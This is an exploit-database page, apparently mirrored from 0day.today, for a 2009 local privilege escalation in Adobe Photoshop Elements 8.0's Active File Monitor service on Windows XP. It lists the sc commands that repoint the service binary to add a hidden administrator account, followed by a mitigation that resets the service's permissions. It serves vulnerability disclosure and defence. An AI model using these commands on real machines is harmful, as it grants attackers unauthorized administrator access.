Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Adobe Photoshop Elements 8.0 Active File Monitor Privilege Escalation

🗓️ 29 Sep 2009 00:00:00Reported by PyrokinesisType 
zdt
 zdt🔗 0day.today👁 14 Views

Adobe Photoshop Elements 8.0 Active File Monitor Privilege Escalation allows local elevation of privileges on Microsoft Windows XP SP3 due to an improper security descriptor in the "Adobe Active File Monitor V8" service

Code
=====================================================================
Adobe Photoshop Elements 8.0 Active File Monitor Privilege Escalation
=====================================================================


# Title: Adobe Photoshop Elements 8.0 Active File Monitor Privilege Escalation
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pyrokinesis
# Published: 2009-09-29
# Verified: yes

view source
print?
Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
 
Tested on Microsoft Windows XP SP3
 
The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.
A malicious user of the Users group (which on xp means a "limited account") can stop the service,
then invoke the "sc config" command to replace the binary path with a value of choice, then restart
the service to run the command with SYSTEM privileges ex., run theese commands as a limited user:
 
sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd
 
now login as administrator with password "kills"
 
mitigation:
 
the security descriptor of the service is like this:
 
C:\>sc sdshow "AdobeActiveFileMonitor8.0"
 
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
 
note the WO and WD permission for Everyone (!!!!!)
 
change the security descriptor like the following:
 
c:\sc sdset "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS
 
readings, interesting article:
http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-specific-service-windows.aspx



#  0day.today [2018-04-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Sep 2009 00:00Current
6.8Medium risk
Vulners AI Score6.8
adobe photoshop elements 8.0active file monitorprivilege escalationsecurity descriptorlocal elevationmicrosoft windows xp sp3
14